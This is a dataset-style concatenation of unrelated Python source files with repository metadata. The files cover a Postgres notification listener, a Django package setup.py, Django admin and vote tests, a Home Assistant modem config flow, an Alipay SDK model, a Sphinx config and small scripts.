            # being down) does not turn this retry loop into a busy spin.
            # NOTE(review): under eventlet monkey-patching this sleep yields
            # to the hub instead of blocking the process -- confirm patching
            # is enabled in this service.
            time.sleep(1)
def __listen(socketio, client_manager):
    """Block on PostgreSQL 'console_update' notifications forever.

    Uses eventlet's trampoline() so only this green thread is suspended
    while the connection socket is unreadable; each notification payload is
    dispatched to __handle_event() as a background task.
    """
    conn = connect_db()
    # Autocommit so LISTEN takes effect immediately and notifications are
    # delivered outside of any transaction.
    conn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
    cur = conn.cursor()
    cur.execute("LISTEN console_update")
    while True:
        # Yield to the eventlet hub until the connection becomes readable.
        trampoline(conn, read=True)
        conn.poll()
        # Drain every queued notification before blocking again.
        while conn.notifies:
            n = conn.notifies.pop()
            socketio.start_background_task(__handle_event,
                                           json.loads(n.payload),
                                           socketio,
                                           client_manager)
| [
"steffen@infrabox.net"
] | steffen@infrabox.net |
630e3b59bc97ae65efd9cdf123fa18dc17a216c8 | 69c81130633ba4d41b1ec938f0fc586f777e95ba | /setup.py | 7e3762cd896e38a132a848717fe69bc6b7b3c13b | [
"ISC"
] | permissive | pregiotek/drf-tracking | d8ff934e884e7908f997f524d4e363914c2f11b2 | f40c87a7e392009cdffa7b893e964b51f2faeb5b | refs/heads/master | 2021-01-18T07:51:57.961574 | 2016-09-09T14:34:44 | 2016-09-09T14:34:44 | 67,803,102 | 1 | 0 | null | 2016-09-09T13:54:10 | 2016-09-09T13:54:08 | Python | UTF-8 | Python | false | false | 2,771 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
import os
import sys
from setuptools import setup
name = 'drf-tracking'
package = 'rest_framework_tracking'
description = 'Utils to log Django Rest Framework requests to the database'
url = 'https://github.com/aschn/drf-tracking'
author = 'Anna Schneider'
author_email = 'anna@WattTime.org'
license = 'BSD'
def get_version(package):
    """
    Return package version as listed in `__version__` in `__init__.py`.
    """
    # Use a context manager so the file handle is closed deterministically
    # (the original left it to the garbage collector).
    with open(os.path.join(package, '__init__.py')) as f:
        init_py = f.read()
    return re.search("^__version__ = ['\"]([^'\"]+)['\"]",
                     init_py, re.MULTILINE).group(1)
def get_packages(package):
    """
    Return root package and all sub-packages.
    """
    # A directory is a package iff it contains an __init__.py.
    packages = []
    for dirpath, _dirnames, _filenames in os.walk(package):
        if os.path.exists(os.path.join(dirpath, '__init__.py')):
            packages.append(dirpath)
    return packages
def get_package_data(package):
    """
    Return all files under the root package, that are not in a
    package themselves.
    """
    filepaths = []
    for dirpath, _dirnames, filenames in os.walk(package):
        # Skip package directories; their .py files ship via get_packages().
        if os.path.exists(os.path.join(dirpath, '__init__.py')):
            continue
        # Make the path relative to the package root.
        base = dirpath.replace(package + os.sep, '', 1)
        filepaths.extend(os.path.join(base, filename)
                         for filename in filenames)
    return {package: filepaths}
version = get_version(package)
if sys.argv[-1] == 'publish':
if os.system("pip freeze | grep wheel"):
print("wheel not installed.\nUse `pip install wheel`.\nExiting.")
sys.exit()
os.system("python setup.py sdist upload")
os.system("python setup.py bdist_wheel upload")
print("You probably want to also tag the version now:")
print(" git tag -a {0} -m 'version {0}'".format(version))
print(" git push --tags")
sys.exit()
setup(
name=name,
version=version,
url=url,
license=license,
description=description,
author=author,
author_email=author_email,
packages=get_packages(package),
package_data=get_package_data(package),
install_requires=[],
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Natural Language :: English',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Internet :: WWW/HTTP',
]
)
| [
"annarschneider@gmail.com"
] | annarschneider@gmail.com |
970297db1b672f47016ec7d408bacef3cc4da9e3 | eec9299fd80ed057585e84e0f0e5b4d82b1ed9a7 | /user/admin.py | 0b8e5495afbf1e7b37d5a28a0f436f6a35c69dc8 | [] | no_license | aimiliya/mysite | f51967f35c0297be7051d9f485dd0e59b8bb60c2 | b8e3b639de6c89fb8e6af7ee0092ee744a75be41 | refs/heads/master | 2020-04-08T19:06:36.539404 | 2018-12-01T08:05:18 | 2018-12-01T08:05:18 | 159,640,181 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 718 | py | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.contrib.auth.admin import User
from .models import Profile
class ProfileInline(admin.StackedInline):
    """Inline editor so Profile fields appear on the User admin page."""
    model = Profile
    # The profile is managed together with its user; forbid inline deletion.
    can_delete = False
class UserAdmin(BaseUserAdmin):
    """Stock Django UserAdmin extended with the Profile inline and a
    nickname column in the change list."""
    inlines = (ProfileInline,)
    list_display = ('username', 'nickname', 'email', 'is_staff', 'is_active', 'is_superuser')
    def nickname(self, obj):
        # NOTE(review): assumes every User has a related Profile; this
        # raises Profile.DoesNotExist otherwise -- confirm a signal or
        # save hook always creates the profile.
        return obj.profile.nickname
    nickname.short_description = '昵称'
# Re-register UserAdmin
admin.site.unregister(User)
admin.site.register(User, UserAdmin)
@admin.register(Profile)
class ProfileAdmin(admin.ModelAdmin):
    """Standalone admin for Profile rows (also editable inline on User)."""
    list_display = ('user', 'nickname')
"951416267@qq.com"
] | 951416267@qq.com |
99ed850db9f54ab4480a94c40c385368950b6d31 | 58f8ba80b7288aa762e114b9d6476ef911a64044 | /tests/level4-1/test_app2_responses.py | d6a6c8f99ee51d3aff9052118e8cb493c59dc8bf | [
"MIT"
] | permissive | hansroh/skitai | a3cc80b1b0ef152ee22926b40a5c22a872c4235d | c54990839a634544ae26ec2d2c2d755e2b34f99c | refs/heads/master | 2023-01-22T23:49:42.868422 | 2023-01-04T10:14:38 | 2023-01-04T10:14:38 | 77,034,278 | 5 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,067 | py | import requests
import platform
def test_app (launch):
    """End-to-end checks against examples/app2.py: the ``launch`` fixture
    starts the app and ``engine`` issues HTTP requests to it."""
    with launch ("./examples/app2.py") as engine:
        # Threaded producer endpoint streams a fixed-size payload.
        resp = engine.get ('/threaproducer')
        assert resp.status_code == 200
        assert len (resp.data) == 100000
        # Map-in-thread endpoint returns a JSON object.
        resp = engine.get ('/map_in_thread')
        assert resp.status_code == 200
        assert resp.data == {'media': 'Hello'}
        # Static image response: etag plus correct type/length headers.
        resp = engine.get ('/reindeer')
        assert resp.headers.get ('etag')
        assert resp.headers.get ('content-type') == 'image/jpeg'
        assert resp.headers.get ('content-length') == '32772'
        # Same file served as a raw download.
        resp = engine.get ('/file')
        assert resp.headers.get ('content-type') == 'application/octet-stream'
        assert resp.headers.get ('content-length') == '32772'
        # Chunked streaming response with a custom status code.
        resp = engine.get ('/stream')
        assert resp.status_code == 210
        assert resp.headers.get ('content-type') == 'text/plain'
        assert resp.data.count (b'<CHUNK>') == 100
        # Result produced via a thread future.
        resp = engine.get ('/thread_future')
        assert resp.status_code == 200
        assert resp.data == b'Hello'
| [
"hansroh@gmail.com"
] | hansroh@gmail.com |
acf0b8131f06d50afc7b3cb0f11b74a4e2b1a554 | 5d61565651b7ba5fa8fade3313a5e82fca8b6686 | /interface/migrations/0002_prjcheck_fpic.py | 546e9fd2488175f24de03e710e76989c914de9ef | [] | no_license | lonelyxmas/ISMS | d597b00072bfa77907875f575b866fbb1fb53295 | 08c5e2f3518fc639cf1a1f2869f4b2f3ae58e306 | refs/heads/master | 2023-08-14T12:02:59.001215 | 2021-03-22T03:34:58 | 2021-03-22T03:34:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 452 | py | # Generated by Django 2.1.4 on 2019-12-27 21:09
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django: adds the optional FPic image field
    # (uploads stored under 'itemcheckpic/') to the PrjCheck model.
    dependencies = [
        ('interface', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='prjcheck',
            name='FPic',
            field=models.ImageField(blank=True, default='', null=True, upload_to='itemcheckpic/', verbose_name='检查图片'),
        ),
    ]
| [
"11325818@qq.com"
] | 11325818@qq.com |
91ff036f6c97b605a72a9b5abf1bbfc31a53e774 | c18ba3fe85ae03f084bd2fef2eb4abf83ca41fd1 | /ptp/wikidata.py | 5c413f80db2e9600537f1a8c0a17f598a1d6d0f5 | [
"Apache-2.0"
] | permissive | MusaabKh/ProceedingsTitleParser | 9f68d11d02193f817a0db830f124de2a68a721e1 | b48832e9032e41785f61338f6ff2f5cac91aba0e | refs/heads/master | 2023-02-24T20:08:23.096893 | 2021-01-31T09:36:26 | 2021-01-31T09:36:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,035 | py | '''
Created on 2020-07-11
@author: wf
'''
import os
from ptp.titleparser import TitleParser
from ptp.event import EventManager, Event
class WikiData(object):
    '''
    WikiData proceedings titles event source
    '''
    defaultEndpoint="https://query.wikidata.org/sparql"
    def __init__(self, config=None):
        '''
        Constructor
        Args:
            config(StorageConfig): the storage configuration to use
        '''
        self.em=EventManager('wikidata',url='https://www.wikidata.org/wiki/Wikidata:Main_Page',title='Wikidata',config=config)
        self.debug=self.em.config.debug
        self.profile=self.em.config.profile
        # Sample data ships next to this package.
        path=os.path.dirname(__file__)
        self.sampledir=path+"/../sampledata/"
        self.sampleFilePath=self.sampledir+"proceedings-wikidata.txt"
    def cacheEvents(self,limit=1000000,batchSize=500):
        '''
        initialize me from my sample file
        Args:
            limit(int): the maximum number of events to cache
            batchSize(int): the batchSize to use
        '''
        # Parse the proceedings titles sample with the default title parser.
        tp=TitleParser.getDefault(self.em.name)
        tp.fromFile(self.sampleFilePath, "wikidata")
        tc,errs,result=tp.parseAll()
        if self.debug:
            print(tc)
            print("%d errs %d titles" % (len(errs),len(result)))
        # Only titles with a recognized acronym and an eventId become events.
        for title in result:
            if 'acronym' in title.metadata():
                if self.debug:
                    print(title.metadata())
                if 'eventId' in title.info:
                    event=Event()
                    event.fromTitle(title,self.debug)
                    # Strip the entity URL prefix so eventId is the bare Q-id.
                    event.eventId=event.eventId.replace("http://www.wikidata.org/entity/","")
                    event.url="%s" % (title.info['eventId'])
                    self.em.add(event)
        self.em.store(limit=limit,batchSize=batchSize)
    def initEventManager(self):
        ''' init my event manager '''
        # Build the cache from the sample file on first use; afterwards load
        # from the configured store.
        if not self.em.isCached():
            self.cacheEvents()
        else:
            self.em.fromStore()
        self.em.extractCheckedAcronyms()
| [
"wf@bitplan.com"
] | wf@bitplan.com |
3d9b3e3a8e24455f1d17ac7a5e2af516ed052473 | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/domain/AlipayOpenMiniWidgetDataSyncModel.py | 7686d4a08b1e579200406d13612fb354366b681e | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 4,131 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.WidgetActivityInfo import WidgetActivityInfo
from alipay.aop.api.domain.WidgetGoodsInfo import WidgetGoodsInfo
class AlipayOpenMiniWidgetDataSyncModel(object):
def __init__(self):
self._activity_list = None
self._data_type = None
self._goods_list = None
self._mini_app_id = None
self._pid = None
@property
def activity_list(self):
return self._activity_list
@activity_list.setter
def activity_list(self, value):
if isinstance(value, list):
self._activity_list = list()
for i in value:
if isinstance(i, WidgetActivityInfo):
self._activity_list.append(i)
else:
self._activity_list.append(WidgetActivityInfo.from_alipay_dict(i))
@property
def data_type(self):
return self._data_type
@data_type.setter
def data_type(self, value):
self._data_type = value
@property
def goods_list(self):
return self._goods_list
@goods_list.setter
def goods_list(self, value):
if isinstance(value, list):
self._goods_list = list()
for i in value:
if isinstance(i, WidgetGoodsInfo):
self._goods_list.append(i)
else:
self._goods_list.append(WidgetGoodsInfo.from_alipay_dict(i))
@property
def mini_app_id(self):
return self._mini_app_id
@mini_app_id.setter
def mini_app_id(self, value):
self._mini_app_id = value
@property
def pid(self):
return self._pid
@pid.setter
def pid(self, value):
self._pid = value
def to_alipay_dict(self):
params = dict()
if self.activity_list:
if isinstance(self.activity_list, list):
for i in range(0, len(self.activity_list)):
element = self.activity_list[i]
if hasattr(element, 'to_alipay_dict'):
self.activity_list[i] = element.to_alipay_dict()
if hasattr(self.activity_list, 'to_alipay_dict'):
params['activity_list'] = self.activity_list.to_alipay_dict()
else:
params['activity_list'] = self.activity_list
if self.data_type:
if hasattr(self.data_type, 'to_alipay_dict'):
params['data_type'] = self.data_type.to_alipay_dict()
else:
params['data_type'] = self.data_type
if self.goods_list:
if isinstance(self.goods_list, list):
for i in range(0, len(self.goods_list)):
element = self.goods_list[i]
if hasattr(element, 'to_alipay_dict'):
self.goods_list[i] = element.to_alipay_dict()
if hasattr(self.goods_list, 'to_alipay_dict'):
params['goods_list'] = self.goods_list.to_alipay_dict()
else:
params['goods_list'] = self.goods_list
if self.mini_app_id:
if hasattr(self.mini_app_id, 'to_alipay_dict'):
params['mini_app_id'] = self.mini_app_id.to_alipay_dict()
else:
params['mini_app_id'] = self.mini_app_id
if self.pid:
if hasattr(self.pid, 'to_alipay_dict'):
params['pid'] = self.pid.to_alipay_dict()
else:
params['pid'] = self.pid
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayOpenMiniWidgetDataSyncModel()
if 'activity_list' in d:
o.activity_list = d['activity_list']
if 'data_type' in d:
o.data_type = d['data_type']
if 'goods_list' in d:
o.goods_list = d['goods_list']
if 'mini_app_id' in d:
o.mini_app_id = d['mini_app_id']
if 'pid' in d:
o.pid = d['pid']
return o
| [
"jishupei.jsp@alibaba-inc.com"
] | jishupei.jsp@alibaba-inc.com |
757fa10fa71cf83c4ddce1e7fe97f57729e28263 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02258/s174082799.py | ec4c268e53e6fd615b4b7d4c2cbd623cf2fc2291 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 192 | py | n = int(input())
a = []
for i in range(n):
a.append(int(input()))
maxv = -(10**9)
mina = a[0]
for i in range(1,n):
maxv = max(maxv, a[i]-mina)
mina = min(mina, a[i])
print(maxv) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
fce5b5f2ed42e0117e781fb4e217c76333570e72 | 8bda8911512f1c454f5e75ef36f3d828661b1479 | /math_03/test04.py | 825c4353a53aea3c85d7334e46178e3e6b4ea99a | [] | no_license | choijaehoon1/backjoon | 0f5909a1e1d416f8f431d6b986754af7eb6a3396 | a0411dba08c057a312733e38683246162256e61d | refs/heads/master | 2023-02-26T12:28:33.733297 | 2021-02-05T13:28:33 | 2021-02-05T13:28:33 | 280,430,716 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | import math
a,b = map(int,input().split())
gcd = math.gcd(a,b)
tmp_a = a // gcd
tmp_b = b // gcd
result = tmp_a * tmp_b * gcd
print(gcd)
print(result)
| [
"wogns_20@naver.com"
] | wogns_20@naver.com |
a4965ebdbf2345026b3cf7f906d6d34263e5a778 | 2c74bb301f1ed83b79254944183ac5a18a639fdf | /homeassistant/components/modem_callerid/config_flow.py | 2bc857a16f43a79d68aca1bd9f922d9893d43e62 | [
"Apache-2.0"
] | permissive | Adminiuga/home-assistant | 5bec93007ddac1a268cc359bf7e48530c5f73b38 | dcf68d768e4f628d038f1fdd6e40bad713fbc222 | refs/heads/dev | 2023-02-22T22:03:31.013931 | 2022-11-09T00:27:20 | 2022-11-09T00:27:20 | 123,929,062 | 5 | 4 | Apache-2.0 | 2023-02-22T06:14:31 | 2018-03-05T14:11:09 | Python | UTF-8 | Python | false | false | 4,450 | py | """Config flow for Modem Caller ID integration."""
from __future__ import annotations
from typing import Any
from phone_modem import PhoneModem
import serial.tools.list_ports
from serial.tools.list_ports_common import ListPortInfo
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.components import usb
from homeassistant.const import CONF_DEVICE, CONF_NAME
from homeassistant.data_entry_flow import FlowResult
from .const import DEFAULT_NAME, DOMAIN, EXCEPTIONS
DATA_SCHEMA = vol.Schema({"name": str, "device": str})
def _generate_unique_id(port: ListPortInfo) -> str:
"""Generate unique id from usb attributes."""
return f"{port.vid}:{port.pid}_{port.serial_number}_{port.manufacturer}_{port.description}"
class PhoneModemFlowHandler(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a config flow for Phone Modem."""
def __init__(self) -> None:
"""Set up flow instance."""
self._device: str | None = None
async def async_step_usb(self, discovery_info: usb.UsbServiceInfo) -> FlowResult:
"""Handle USB Discovery."""
device = discovery_info.device
dev_path = await self.hass.async_add_executor_job(usb.get_serial_by_id, device)
unique_id = f"{discovery_info.vid}:{discovery_info.pid}_{discovery_info.serial_number}_{discovery_info.manufacturer}_{discovery_info.description}"
if (
await self.validate_device_errors(dev_path=dev_path, unique_id=unique_id)
is None
):
self._device = dev_path
return await self.async_step_usb_confirm()
return self.async_abort(reason="cannot_connect")
async def async_step_usb_confirm(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Handle USB Discovery confirmation."""
if user_input is not None:
return self.async_create_entry(
title=user_input.get(CONF_NAME, DEFAULT_NAME),
data={CONF_DEVICE: self._device},
)
self._set_confirm_only()
return self.async_show_form(step_id="usb_confirm")
async def async_step_user(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Handle a flow initiated by the user."""
errors: dict[str, str] | None = {}
if self._async_in_progress():
return self.async_abort(reason="already_in_progress")
ports = await self.hass.async_add_executor_job(serial.tools.list_ports.comports)
existing_devices = [
entry.data[CONF_DEVICE] for entry in self._async_current_entries()
]
unused_ports = [
usb.human_readable_device_name(
port.device,
port.serial_number,
port.manufacturer,
port.description,
port.vid,
port.pid,
)
for port in ports
if port.device not in existing_devices
]
if not unused_ports:
return self.async_abort(reason="no_devices_found")
if user_input is not None:
port = ports[unused_ports.index(str(user_input.get(CONF_DEVICE)))]
dev_path = await self.hass.async_add_executor_job(
usb.get_serial_by_id, port.device
)
errors = await self.validate_device_errors(
dev_path=dev_path, unique_id=_generate_unique_id(port)
)
if errors is None:
return self.async_create_entry(
title=user_input.get(CONF_NAME, DEFAULT_NAME),
data={CONF_DEVICE: dev_path},
)
user_input = user_input or {}
schema = vol.Schema({vol.Required(CONF_DEVICE): vol.In(unused_ports)})
return self.async_show_form(step_id="user", data_schema=schema, errors=errors)
async def validate_device_errors(
self, dev_path: str, unique_id: str
) -> dict[str, str] | None:
"""Handle common flow input validation."""
self._async_abort_entries_match({CONF_DEVICE: dev_path})
await self.async_set_unique_id(unique_id)
self._abort_if_unique_id_configured(updates={CONF_DEVICE: dev_path})
try:
api = PhoneModem()
await api.test(dev_path)
except EXCEPTIONS:
return {"base": "cannot_connect"}
else:
return None
| [
"noreply@github.com"
] | Adminiuga.noreply@github.com |
9701179c2d1d86e8d46e81423ada9305f0e75887 | 657bad752fd4603b5c5e44a59aa6a2210d343bf0 | /huxiu/huxiu/test.py | bf7fcfcd9022935eef9a3881692284db3b55938d | [] | no_license | PurpleBreeze0322/web-scraping-cases | 0ed1a6f611289898004d07ef409d783c5ca25898 | 8b8c8c15671f2c0e7283d2e6428d44786478fede | refs/heads/master | 2021-05-22T13:57:40.849489 | 2018-09-30T14:25:15 | 2018-09-30T14:25:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 924 | py | from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium import webdriver
headers = {
"Accept-Encoding":"gzip, deflate",
"Accept-Language":"zh-CN, zh;q=0.8",
"Connection":"keep-alive",
"Host":"img.titan007.com",
"Referer":"http://zq.win007.com/cn/CupMatch/2018/75.html",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
}
driver = webdriver.PhantomJS(executable_path=r'D:\03-CS\plantomJS\phantomjs-2.1.1-windows\bin\phantomjs')
driver.get('http://zq.win007.com/cn/CupMatch/75.html' )
try:
element = WebDriverWait(driver, 30).until(EC.presence_of_element_located((By.XPATH, '//*[@id="ScoreGroupDiv"][@style="display: block;"]')))
finally:
print(driver.page_source)
driver.close() | [
"wuqili1025@gmail.com"
] | wuqili1025@gmail.com |
591f1ad12a3d97363911cc7e996a2fa9768a008f | 61a5e9adfcd292dcf06fceda993c0fbeb0b469cc | /alg/leetcode/b40combinenum2.py | 5361ab60cff911ae885e89c6bedebf9e12615f9b | [] | no_license | godspysonyou/everything | f76e0ade065601990ff5b449f8c5955ba3c07374 | 03c7ec9d9e5a802ffbc854a9f929ca770ae7add8 | refs/heads/master | 2020-03-20T23:34:50.812645 | 2019-04-21T13:16:58 | 2019-04-21T13:16:58 | 137,853,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,081 | py | class Solution:
def __init__(self):
self.ret=[]
def DFS(self, candidates, target, start, valueslist):
length = len(candidates)
if target==0:
return self.ret.append(valueslist)
before = -1 # 设置before是为了避免这一层中有相同的初始, 如 1 1,将会产生,用 if i in list会更好
for i in range(start,length):
if target<candidates[i]:
return
if candidates[i]==before:
continue
before = candidates[i]
cantemp = candidates.copy()
cantemp.remove(candidates[i])
self.DFS(cantemp,target-candidates[i],i,valueslist+[candidates[i]])
def combinationSum2(self, candidates, target):
"""
:type candidates: List[int]
:type target: int
:rtype: List[List[int]]
"""
candidates.sort()
self.DFS(candidates, target, 0, [])
return self.ret
if __name__ == '__main__':
l = [1]
t = 1
s = Solution()
print(s.combinationSum2(l, t)) | [
"1344094556@qq.com"
] | 1344094556@qq.com |
809de22e39392cd22203c2ab663bdb9e6901856d | 6fcfb638fa725b6d21083ec54e3609fc1b287d9e | /python/jupyterhub_jupyterhub/jupyterhub-master/docs/source/conf.py | 83b19bab19ab399e13108106e184f1424fe934bd | [] | no_license | LiuFang816/SALSTM_py_data | 6db258e51858aeff14af38898fef715b46980ac1 | d494b3041069d377d6a7a9c296a14334f2fa5acc | refs/heads/master | 2022-12-25T06:39:52.222097 | 2019-12-12T08:49:07 | 2019-12-12T08:49:07 | 227,546,525 | 10 | 7 | null | 2022-12-19T02:53:01 | 2019-12-12T07:29:39 | Python | UTF-8 | Python | false | false | 5,011 | py | # -*- coding: utf-8 -*-
#
import sys
import os
import shlex
# For conversion from markdown to html
import recommonmark.parser
# Set paths
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# Minimal Sphinx version
needs_sphinx = '1.4'
# Sphinx extension modules
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx.ext.napoleon',
'autodoc_traits',
]
templates_path = ['_templates']
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'JupyterHub'
copyright = u'2016, Project Jupyter team'
author = u'Project Jupyter team'
# Autopopulate version
from os.path import dirname
docs = dirname(dirname(__file__))
root = dirname(docs)
sys.path.insert(0, root)
sys.path.insert(0, os.path.join(docs, 'sphinxext'))
import jupyterhub
# The short X.Y version.
version = '%i.%i' % jupyterhub.version_info[:2]
# The full version, including alpha/beta/rc tags.
release = jupyterhub.__version__
language = None
exclude_patterns = []
pygments_style = 'sphinx'
todo_include_todos = False
# Set the default role so we can use `foo` instead of ``foo``
default_role = 'literal'
# -- Source -------------------------------------------------------------
source_parsers = {
'.md': 'recommonmark.parser.CommonMarkParser',
}
source_suffix = ['.rst', '.md']
#source_encoding = 'utf-8-sig'
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages.
html_theme = 'sphinx_rtd_theme'
#html_theme_options = {}
#html_theme_path = []
#html_title = None
#html_short_title = None
#html_logo = None
#html_favicon = None
# Paths that contain custom static files (such as style sheets)
html_static_path = ['_static']
#html_extra_path = []
#html_last_updated_fmt = '%b %d, %Y'
#html_use_smartypants = True
#html_sidebars = {}
#html_additional_pages = {}
#html_domain_indices = True
#html_use_index = True
#html_split_index = False
#html_show_sourcelink = True
#html_show_sphinx = True
#html_show_copyright = True
#html_use_opensearch = ''
#html_file_suffix = None
#html_search_language = 'en'
#html_search_options = {'type': 'default'}
#html_search_scorer = 'scorer.js'
htmlhelp_basename = 'JupyterHubdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
#'papersize': 'letterpaper',
#'pointsize': '10pt',
#'preamble': '',
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'JupyterHub.tex', u'JupyterHub Documentation',
u'Project Jupyter team', 'manual'),
]
#latex_logo = None
#latex_use_parts = False
#latex_show_pagerefs = False
#latex_show_urls = False
#latex_appendices = []
#latex_domain_indices = True
# -- manual page output -------------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'jupyterhub', u'JupyterHub Documentation',
[author], 1)
]
#man_show_urls = False
# -- Texinfo output -----------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'JupyterHub', u'JupyterHub Documentation',
author, 'JupyterHub', 'One line description of project.',
'Miscellaneous'),
]
#texinfo_appendices = []
#texinfo_domain_indices = True
#texinfo_show_urls = 'footnote'
#texinfo_no_detailmenu = False
# -- Epub output --------------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# -- Intersphinx ----------------------------------------------------------
intersphinx_mapping = {'https://docs.python.org/': None}
# -- Read The Docs --------------------------------------------------------
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd:
# only import and set the theme if we're building docs locally
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
else:
# readthedocs.org uses their theme by default, so no need to specify it
# build rest-api, since RTD doesn't run make
from subprocess import check_call as sh
sh(['make', 'rest-api'], cwd=docs)
# -- Spell checking -------------------------------------------------------
try:
import sphinxcontrib.spelling
except ImportError:
pass
else:
extensions.append("sphinxcontrib.spelling")
spelling_word_list_filename='spelling_wordlist.txt'
| [
"659338505@qq.com"
] | 659338505@qq.com |
0166f5b538f4e262750f9bf67ddf7ea54da2b5de | 82b26633d243d27ad3f9920681095de3d88d0419 | /votes/tests.py | dd514d3dc0922c4080642323c39e4930ebf4862f | [] | no_license | ashishkharcheiuforks/reReddit_backend | f3cc0ffae234fecd4d04a8156bb2fea6e32aa23f | fbbc9d8977d7a996c41d92636034a50490b05c26 | refs/heads/master | 2021-04-23T20:20:32.029877 | 2019-03-25T22:17:46 | 2019-03-25T22:17:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,947 | py | from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from rest_framework.test import APIClient
from redditors.models import User, UserSubMembership
from subs.models import Sub
from posts.models import Post
from comments.models import Comment
from votes.models import CommentVote, PostVote
class VoteTestBase(APITestCase):
"""
There is a lot of setup necessary for testing votes.
This class will help get some of that out of the way
"""
def setUp(self):
self.subreddit = Sub.objects.create(
title='test_subreddit'
)
# two users are needed, one creates content, 'poster' the other
# votes on it 'voter'
self.poster_data = {
'username': 'test_username',
'email': 'test@gmail.com',
'password': 'test_password',
}
self.poster = User.objects.create(**self.poster_data)
self.voter_data = {
'username': 'test_username_2',
'email': 'test2@gmail.com',
'password': 'test_password',
}
self.voter = User.objects.create(**self.voter_data)
self.post = Post.objects.create(
title="test_post_title",
body="test_post_body",
subreddit=self.subreddit,
poster=self.poster
)
self.comment = Comment.objects.create(
body="test comment",
post=self.post,
parent=None,
poster=self.poster
)
self.client.force_login(self.voter)
self.vote_url = reverse('vote')
self.comment_vote_data = lambda vote_type : {
"item_fn": "t1_{}".format(self.comment.pk),
"vote_type": vote_type
}
self.post_vote_data = lambda vote_type : {
"item_fn": "t2_{}".format(self.post.pk),
"vote_type": vote_type
}
self.vote_data = lambda type, vote_type : {
"item_fn": "{}_{}".format(type, self.post.pk),
"vote_type": vote_type
}
self.class_type = {
"t1": CommentVote,
"t2": PostVote
}
class VoteViewTests(VoteTestBase):
"""
Testing vote creation and updating with requests
"""
def test_upvote(self):
"""
An authorized user can upvote on a comment and a post
"""
for key in self.class_type.keys():
response = self.client.post(self.vote_url, self.vote_data(key, 1))
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(self.class_type[key].objects.count(), 1)
self.assertEqual(self.class_type[key].objects.first().vote_type, 1)
def test_downvote(self):
"""
An authorized user can downvote on a comment and a post
"""
for key in self.class_type.keys():
response = self.client.post(self.vote_url, self.vote_data(key, -1))
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(self.class_type[key].objects.count(), 1)
self.assertEqual(self.class_type[key].objects.first().vote_type, -1)
